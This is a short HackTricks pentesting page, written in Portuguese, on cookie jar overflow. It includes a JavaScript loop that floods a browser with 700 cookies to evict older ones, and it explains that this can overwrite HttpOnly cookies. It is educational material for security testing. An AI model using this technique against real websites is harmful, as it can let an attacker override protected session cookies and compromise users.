hacktricks/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md

3.1 KiB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Os navegadores têm um limite no número de cookies que podem armazenar para uma página. Então, se por algum motivo você precisar fazer um cookie desaparecer, você pode transbordar o jarro de cookies já que os mais antigos serão excluídos primeiro:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Observe que cookies de terceiros apontando para um domínio diferente não serão sobrescritos.

{% hint style="danger" %} Este ataque também pode ser usado para sobrescrever cookies HttpOnly, pois você pode excluí-lo e, em seguida, redefini-lo com o valor que deseja.

Verifique isso em este post com um laboratório. {% endhint %}

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}